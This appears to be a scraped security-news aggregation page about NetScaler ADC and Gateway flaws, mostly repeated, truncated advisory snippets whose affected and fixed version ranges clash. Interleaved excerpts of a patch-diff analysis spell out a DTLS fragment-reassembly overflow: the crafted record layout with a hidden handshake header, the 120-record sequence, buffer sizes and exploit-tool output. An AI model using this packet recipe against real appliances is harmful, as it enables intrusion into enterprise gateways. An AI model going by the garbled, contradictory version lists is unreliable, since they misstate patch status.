│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3
│ fragment_offset = 0
│ fragment_length = 1434
└── 1,315 remaining bytes
The unusual part is the first handshake header.
organisation
National Cyber Security Center
In 2025, after a NetScaler flaw was
exploited as a zero-day
against Dutch organizations, the Netherlands' National Cyber Security Center
said
that updating alone did not remove the risk, because an attacker could keep access gained before the patch, and told administrators to run its check scripts.
organisation
WatchTowr
WatchTowr
explained
that Citrix NetScaler is a “family of application delivery controllers and VPN gateway appliances found in virtually every large enterprise network on the planet.”
High-profile hacking campaigns targeting the products — colloquially known as Citrix Bleed
One
and
Two
— led to
hundreds of breaches
and another Citrix NetScaler ADC bug
emerged in March
.
organisation
Citrix Bleed
WatchTowr
explained
that Citrix NetScaler is a “family of application delivery controllers and VPN gateway appliances found in virtually every large enterprise network on the planet.”
High-profile hacking campaigns targeting the products — colloquially known as Citrix Bleed
One
and
Two
— led to
hundreds of breaches
and another Citrix NetScaler ADC bug
emerged in March
.
organisation
Two New NetScaler Flaws Exploited
Citrix Confirmed Two New NetScaler Flaws Exploited as Zero-Day.
organisation
NetScaler RCE
“We are currently rapidly reacting to rumors that multiple unpatched Citrix NetScaler RCE vulnerabilities are circulating in the wild.
organisation
NetScaler Console
Citrix is providing generic Indicators of Compromise (IoCs) through NetScaler Console to help customers quickly assess whether their NetScaler deployments may have been compromised.
Citrix's existing
guidance
for a suspected NetScaler compromise says to:
Preserve evidence first: a snapshot of a VPX instance, the logs held on remote syslog servers and NetScaler Console, a technical support bundle, and a core dump of the packet engine.
organisation
VPX
Citrix's existing
guidance
for a suspected NetScaler compromise says to:
Preserve evidence first: a snapshot of a VPX instance, the logs held on remote syslog servers and NetScaler Console, a technical support bundle, and a core dump of the packet engine.
organisation
Keep
Keep the management interface off the internet.
organisation
The NetScaler Management Services
"The NetScaler Management Services should never be exposed to the public internet," the guidance says.
Tactical Metrics
Metrics
infrastructure
14.1-73
Software Version
Click for context!
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
The same fix is easier to see as C-like pseudocode:
--- nsppe-14.1-73.30 vulnerable
+++ nsppe-14.1-73.37 fixed
@@
copy_saved_header(scratch, saved_header, saved_header_length);
cursor = scratch + saved_header_length;
+space_left = 0x8c00 - saved_header_length;
for (nsb = fragment_chain; nsb !=
In our version of NSPPE (14.1-73.30)
Citrix’s fixes are available in NetScaler ADC and Gateway 14.1-73.37 and later, and in the 13.1-64.23 and later releases.
The builds 14.1-73.32 and 13.1-63.21, which fixed the previously disclosed authentication-bypass vulnerability
CVE-2026-19490
, are still within the affected range for these new flaws.
The feature is available in NetScaler Console service and on-premises deployments with Cloud Connect, starting with version 14.1-73.36, and requires the telemetry channel to be enabled.
Citrix has not said whether appliances on the August builds, 14.1-73.32 and 13.1-63.21, or any newer builds, are affected by the new flaws.
Metrics
infrastructure
14.1-FIPS
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
Metrics
infrastructure
13.1-64
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
Citrix’s fixes are available in NetScaler ADC and Gateway 14.1-73.37 and later, and in the 13.1-64.23 and later releases.
Metrics
infrastructure
13.1-FIPS
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
…Scaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTLS basics.
Metrics
infrastructure
13.1-NDcPP
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
…Scaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTLS basics.
Metrics
infrastructure
13.1-37
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
…Scaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTLS basics.
Metrics
infrastructure
13.1
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
The 13.1 branch also deserves attention because that release line reached End of Maintenance on September 15.
NetScaler 13.1 reached End of Maintenance on September 15 under
Citrix's release schedule
, and Citrix has not said whether it will get one.
Metrics
infrastructure
37.282
Software Version
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
Metrics
infrastructure
14
Fips
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTL…
Metrics
infrastructure
73
Fips
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
Metrics
financial
73
Netscaler
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
Metrics
infrastructure
13.1.37
Software Version
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Metrics
infrastructure
13
Fips
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTL…
Fixes are also available for the 14.1-FIPS, 13.1-FIPS and 13.1-NDcPP branches.
Metrics
infrastructure
9.5
Software Version
Citrix has released
security updates
to fix CVE-2026-107406 (CVSS score of 9.5), a critical flaw affecting NetScaler ADC and NetScaler Gateway that could allow remote code execution or denial-of-service (DoS) under certain conditions.
Recently, the company
confirmed
active exploitation of two other flaws, respectively tracked as CVE-2026-88771 (CVSS score of 9.5) and CVE-2026-88772 (CVSS score of 9.5), on unpatched systems and urged customers to install the relevant updates as soon as possible.
Both carry severity scores of 9.5 out of 10 and patches have been released for all of the bugs.
“
Citrix confirmed active exploitation of CVE-2026-88771 (CVSS score of 9.5) and CVE-2026-88772 (CVSS score of 9.5) on unpatched systems and urged customers to install the relevant updates as soon as possible.
Metrics
infrastructure
14.1
Software Version
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
Metrics
financial
14
Netscaler Adc
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
Metrics
infrastructure
73
Netscaler Adc Fips
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
Metrics
infrastructure
50,000
Devices
50,000 Devices May Still Be Exposed..
Metrics
data_breach
1
Byte
The issue, per
watchTowr
, is that NetScaler implicitly trusts the declared fragment size in the DTLS handshake header's fragment_length field (i.e., 1 byte), while the header simultaneously claims that the complete message, as denoted by the length field, is 120 bytes long.
When a record carries handshake data, that data begins with a further 12-byte header describing a handshake fragment:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Content Type | Version (DTLS)
Their offsets cover the whole message:
record 1 fragment_offset = 0
record 2 fragment_offset = 1
record 3 fragment_offset = 2
...
Metrics
data_breach
120
Bytes
The issue, per
watchTowr
, is that NetScaler implicitly trusts the declared fragment size in the DTLS handshake header's fragment_length field (i.e., 1 byte), while the header simultaneously claims that the complete message, as denoted by the length field, is 120 bytes long.
"The malicious records tell the reassembly code that each record supplies only one byte of a 120-byte handshake message," Kheirkhah said.
"For example, a 120-byte handshake message can arrive as 120 fragments.
Once every position has arrived, the server considers the 120-byte message complete.
After 120 records, the handshake message is considered complete, but its NSB chain contains about 174 KB of data.
For example, a 120-byte handshake message can arrive as 120 fragments.
The malicious records tell the reassembly code that each record supplies only one byte of a 120-byte handshake message.
Send the 120 malicious records on that socket.
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
It claims two things at once:
length=120
: the complete message is 120 bytes long.
That makes it step over the 120-byte primary area and find the hidden header.
record 120 fragment_offset = 119
After record 120, every position from 0 through 119 has been supplied, so NSPPE marks the 120-byte handshake message as complete.
[+] association ready: 3 server datagrams
[*] sending 120 records (176640 bytes)...
Metrics
data_breach
1,459
Bytes
"
Each received packet of 1,459 bytes is stored in NetScaler Buffers (NSBs), which is then stitched into a single scratch buffer of only 35,840 bytes.
The two 12-byte headers and their declared fragment sizes add up to the complete 1,459-byte body:
12 + 1 + 12 + 1434 = 1459
At the same time, the bytes actually placed in the packet also add up to 1,459:
12 + 120 + 12 + 1315 = 1459
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
The first NSB contributes 1,459 bytes.
Metrics
data_breach
35,840
Bytes
"
Each received packet of 1,459 bytes is stored in NetScaler Buffers (NSBs), which is then stitched into a single scratch buffer of only 35,840 bytes.
That buffer is the scratch buffer, and it is tiny:
0x8c00
bytes, or 35,840.
The vulnerable function then copies that entire chain into the 35,840-byte scratch buffer without checking whether it fits.
[6]
At
[1]
, start with 35,840 bytes of free space.
Metrics
infrastructure
8.8
Software Version
8.8 High
Not reported
